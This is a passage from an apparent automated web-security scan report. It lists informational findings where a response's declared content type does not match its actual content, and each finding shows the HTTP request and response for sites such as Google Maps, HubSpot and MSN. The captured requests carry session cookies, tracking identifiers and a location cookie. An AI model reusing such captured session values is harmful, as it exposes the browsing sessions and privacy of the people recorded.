Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/AuthenticationService.Authenticate

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /maps/api/js/AuthenticationService.Authenticate?1sabout%3Ablank&callback=_xdc_._plzwrg&token=102645 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.googleapis.com

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sun, 24 Apr 2011 16:47:55 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 37

_xdc_._plzwrg && _xdc_._plzwrg( [1] )

33.48. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/ViewportInfoService.GetViewportInfo

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /maps/api/js/ViewportInfoService.GetViewportInfo?1m6&1m2&1d20.072944084517587&2d77.93291173828129&2m2&1d21.11422639607682&2d79.99284826171879&2u10&4sen-US&5e0&callback=_xdc_._hj4orv&token=21018 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.googleapis.com

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sun, 24 Apr 2011 16:47:55 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 420

_xdc_._hj4orv && _xdc_._hj4orv( ["",null,[[19,[[-90,-180],[90,180]]],[18,[[-90,-180],[90,180]]],[9,[[-90,-180],[90,180]]],[8,[[-90,-180],[90,180]]],[14,[[16.00000370000001,59.99999990000001],[80,144.0
...[SNIP]...

33.49. http://maps.gstatic.com/intl/en_us/mapfiles/closedhand_8_8.cur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.gstatic.com
Path:   /intl/en_us/mapfiles/closedhand_8_8.cur

Issue detail

The response contains the following Content-type statement:The response states that it contains a BMP image. However, it actually appears to contain unrecognised content.

Request

GET /intl/en_us/mapfiles/closedhand_8_8.cur HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.gstatic.com

Response

HTTP/1.1 200 OK
Content-Type: image/bmp
Last-Modified: Thu, 17 Sep 2009 03:15:42 GMT
Date: Sun, 24 Apr 2011 16:48:37 GMT
Expires: Sun, 24 Apr 2011 16:48:37 GMT
Cache-Control: private, max-age=31536000
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 326
X-XSS-Protection: 1; mode=block

...... ......0.......(... ...@........................................................................................................................................................................
...[SNIP]...

33.50. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.gstatic.com
Path:   /intl/en_us/mapfiles/openhand_8_8.cur

Issue detail

The response contains the following Content-type statement:The response states that it contains a BMP image. However, it actually appears to contain unrecognised content.

Request

GET /intl/en_us/mapfiles/openhand_8_8.cur HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.gstatic.com

Response

HTTP/1.1 200 OK
Content-Type: image/bmp
Last-Modified: Thu, 17 Sep 2009 03:15:42 GMT
Date: Sun, 24 Apr 2011 16:47:52 GMT
Expires: Sun, 24 Apr 2011 16:47:52 GMT
Cache-Control: private, max-age=31536000
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 326
X-XSS-Protection: 1; mode=block

...... ......0.......(... ...@...............................................................................................................................?...w...g...............................
...[SNIP]...

33.51. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=1098&ref2=http%3A//www.arcsight.com/products/products-identity/&tzo=360&ms=369 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.arcsight.com/products/products-esm/arcsight-express/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=8EE1D10DCCE142B68BB195EB59D8F5BA; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 19:46:49 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

33.52. https://portal.actividentity.com/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://portal.actividentity.com
Path:   /images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /images/favicon.ico HTTP/1.1
Host: portal.actividentity.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303677833.2; __utmc=262184092; __utmb=262184092.1.10.1303677833

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:43:56 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 25 Aug 2009 15:46:42 GMT
ETag: "5001ed-57e-471f93da71c80"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...................................W....................i..>...?.......@...h... q...l..........X.......O...Q.......z...(w..r.......6..`.......................e....j..H.
...[SNIP]...

33.53. http://positivesearches1.app6.hubspot.com/salog.js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://positivesearches1.app6.hubspot.com
Path:   /salog.js.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /salog.js.aspx HTTP/1.1
Host: positivesearches1.app6.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.positivesearchresults.com/?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 496
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=0KM0zrEhzQEkAAAAZTQwOGU2MTAtMGU3Ni00MDM2LTg1MTEtMDIxNzk3YzIyY2My0; expires=Tue, 24-Apr-2012 00:33:01 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=a2dd46d8-2ea8-43a4-bfe0-4b8ea6578157; domain=positivesearches1.app6.hubspot.com; expires=Sat, 24-Apr-2021 05:00:00 GMT; path=/; HttpOnly
Date: Mon, 25 Apr 2011 00:33:00 GMT
Set-Cookie: HUBSPOT39=252777644.0.0000; path=/


var hsUse20Servers = true;
var hsDayEndsIn = 12418;
var hsWeekEndsIn = 12418;
var hsMonthEndsIn = 530818;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-04-24 20:33:0
...[SNIP]...

33.54. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=CMS3TB&AP=1089 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37; MUID=B506C07761D7465D924574124E3C14DF; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2419
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8463121-T20670727-C3000000000037380
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 24 Apr 2011 15:57:52 GMT
Content-Length: 2419


//<![CDATA[
function getRADIds() { return{"adid":"3000000000037380","pid":"8463121","targetid":"20670727"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(paren
...[SNIP]...

33.55. http://sales.liveperson.net/hcp/html/mTag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=71003277 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/ManageBooking.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=71003277
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1a98"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 12:11:38 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

33.56. http://seal.controlcase.com/include/image/cc-logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://seal.controlcase.com
Path:   /include/image/cc-logo.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /include/image/cc-logo.gif HTTP/1.1
Host: seal.controlcase.com
Proxy-Connection: keep-alive
Referer: http://seal.controlcase.com/index.php?page=showCert&cId=3063048179
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bdd7e08025b8d8869d5df96b3c45398b

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:00:24 GMT
Server: Apache/2.0.55 (Win32)
Last-Modified: Fri, 15 Oct 2010 06:24:07 GMT
ETag: "20947f-903-dfbdbc4a"
Accept-Ranges: bytes
Content-Length: 2307
Content-Type: image/gif

......JFIF.....`.`.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......#.{.."..............................
...[SNIP]...

33.57. http://switch.atdmt.com/jaction/LifeLock_Landing_Page  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://switch.atdmt.com
Path:   /jaction/LifeLock_Landing_Page

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /jaction/LifeLock_Landing_Page HTTP/1.1
Host: switch.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af; ach01=2a0cb15/120af/57ac7cf/903d/4db39163

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 03:08:30 GMT
Connection: close
Content-Length: 1242

function AT_tags(){
try{var tags = new Array();
var imgs = new Array();
tags = ['http://spe.atdmt.com/images/pixel.gif','http://at.amgdgt.com/ads/?t=pp&px=2853&rnd=[cachebuster]','http://
...[SNIP]...

33.58. http://track3.mybloglog.com/js/jsserv.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://track3.mybloglog.com
Path:   /js/jsserv.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /js/jsserv.php?mblID=2008013116011951 HTTP/1.1
Host: track3.mybloglog.com
Proxy-Connection: keep-alive
Referer: http://reputation-watch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:33:38 GMT
Set-Cookie: BX=a84as5l6r9gb2&b=3&s=l5; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.mybloglog.com
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" policyref="http://www.mybloglog.com/w3c/p3p.xml"
Expires: Sun, 01 May 2011 00:00:00 GMT
Set-Cookie: mbl_sid=N2011042417333800; expires=Tue, 24-Apr-2012 00:33:38 GMT; path=/; domain=.mybloglog.com
Cache-Control: private
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6761


<!--
var mbl_recent_visitor='';
var mbl_current_visitor='';
if(typeof(mbl_jsserv_loaded)=='undefined'){var mbl_jsserv_loaded=true;function m_r_e(obj,w,f){if(window.addEventListener){obj.addEventListe
...[SNIP]...

33.59. http://track3.mybloglog.com/tr/urltrk.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://track3.mybloglog.com
Path:   /tr/urltrk.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tr/urltrk.php?i=2008013116011951&t=1&u=http%3A//reputation-watch.com/&a=Mozilla/5.0%20%28Windows%3B%20U%3B%20Windows%20NT%206.1%3B%20en-US%29%20AppleWebKit/534.16%20%28KHTML%2C%20like%20Gecko%29%20Chrome/10.0.648.205%20Safari/534.16&d=20110424&db=&now=1303691629662&v=N2011042417333798 HTTP/1.1
Host: track3.mybloglog.com
Proxy-Connection: keep-alive
Referer: http://reputation-watch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1e4022p6r9gb1&b=3&s=26; mbl_sid=N2011042417333798

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:33:39 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" policyref="http://www.mybloglog.com/w3c/p3p.xml"
Cache-Control: private
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 81


<!-- g3w1.mbl.re1.yahoo.com compressed/chunked Sun Apr 24 17:33:39 PDT 2011 -->

33.60. http://translate.googleapis.com/translate_a/t  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://translate.googleapis.com
Path:   /translate_a/t

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

POST /translate_a/t?anno=3&client=te_lib&format=html&v=1.0 HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://sensic.net/
Origin: http://sensic.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 8415

q=%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20Der%20Schutz%20personenbezogener%20Daten%20ist%20f%C3%BCr%20uns%20sehr%20wichtig%20und%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20geh%C3%B6rt%20f%C3%BCr
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:34:26 GMT
Expires: Sun, 24 Apr 2011 20:34:26 GMT
Cache-Control: private, max-age=600
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=0a5c57f831a9851f:TM=1303677266:LM=1303677266:S=Q-J6avAqgpLgWnkX; expires=Tue, 23-Apr-2013 20:34:26 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 7562

["\n \x3ci\x3eDer Schutz personenbezogener Daten ist f..r uns sehr wichtig und geh..rt f..r uns zur Maxime des t..glichen Handelns.\x3c/i\x3e \x3cb\x3eThe protection of personal data is v
...[SNIP]...

33.61. http://windowsclient.net/omniture/analyticsid.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://windowsclient.net
Path:   /omniture/analyticsid.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /omniture/analyticsid.aspx HTTP/1.1
Host: windowsclient.net
Proxy-Connection: keep-alive
Referer: http://windowsclient.net/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=2dlrmzeif4das3yodap3v2ik; CSAnonymous=a0a12742-b6b7-493e-9db0-cc41c68d5450; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 24 Apr 2011 11:57:33 GMT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 24 Apr 2011 11:57:35 GMT; expires=Mon, 23-Apr-2012 15:57:35 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:35 GMT
Content-Length: 67

<!--
gAnalyticsId="f0c8f1b3-d8ff-4c73-9580-bff076ac29a1";
// -->

33.62. http://www.actividentity.com/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.actividentity.com
Path:   /images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /images/favicon.ico HTTP/1.1
Host: www.actividentity.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303674298.1; __utmc=262184092; __utmb=262184092.1.10.1303674298; PHPSESSID=2knt766ulmukoda54fr91gtu97

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:56:12 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 25 Aug 2009 15:46:42 GMT
ETag: "5001ed-57e-471f93da71c80"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...................................W....................i..>...?.......@...h... q...l..........X.......O...Q.......z...(w..r.......6..`.......................e....j..H.
...[SNIP]...

33.63. http://www.asp.net/omniture/analyticsid.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.asp.net
Path:   /omniture/analyticsid.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /omniture/analyticsid.aspx HTTP/1.1
Host: www.asp.net
Proxy-Connection: keep-alive
Referer: http://www.asp.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:58:05 GMT
Content-Length: 66

<!-- gAnalyticsId="3b23ed19-e31e-4ccc-85e2-6026e9133649";
// -->

33.64. http://www.bluewin.ch/includes/osn/mdd.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bluewin.ch
Path:   /includes/osn/mdd.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /includes/osn/mdd.php?callback=mddJson&tab_id=4312&page_code=RESosnen&tab=res&lang=en HTTP/1.1
Host: www.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://en.swisscom.ch/residential
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Zeus
Date: Sun, 24 Apr 2011 18:51:03 GMT
Content-Type: text/html
Cache-Control: max-age=3600
Connection: close
Vary: Accept-Encoding

mddJson({"mdd":"<div id=\"link_SHOPosnen_dropdown\" class=\"megadropdown \" style=\"display:none;\"><div class=\"mdd-inner\"><div class=\"mdd-header\"><a href=\"javascript:void(0);\" class=\"mdd-close
...[SNIP]...

33.65. https://www.credit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.credit.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.credit.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ex=174a3c15; JSESSIONID=cefKL-PCj0eOzdZlgdj_s; cuc=1303674383496*http://www.credit.com/r/fico_score_watch_enroll/af=p39800&ag=default; st=-7286327643316513930; crc=

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:13:25 GMT
Server: Apache/2
P3P: CP="NOI DSP COR NID CURa ADMa TAIa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
ETag: "4tdt0ChAckA"
Last-Modified: Wed, 20 Apr 2011 23:59:54 GMT
Accept-Ranges: bytes
Cache-Control: max-age=5
Expires: Sun, 24 Apr 2011 20:13:30 GMT
Keep-Alive: timeout=8
Connection: Keep-Alive
Content-Type: text/plain
Content-Length: 1406

..............h.......(....... .................................t..t$......r!......................y-..j........z.......^.......\..y,...L..h................@......`........u..............~4...G..m...^
...[SNIP]...

33.66. https://www.creditchecktotal.com/Message.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.creditchecktotal.com
Path:   /Message.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /Message.aspx?PageTypeID=SessionTimeOut HTTP/1.1
Host: www.creditchecktotal.com
Connection: keep-alive
Referer: https://www.creditchecktotal.com/Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=693&SiteID=100244&sc=668032&bcd=TotalCompare
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
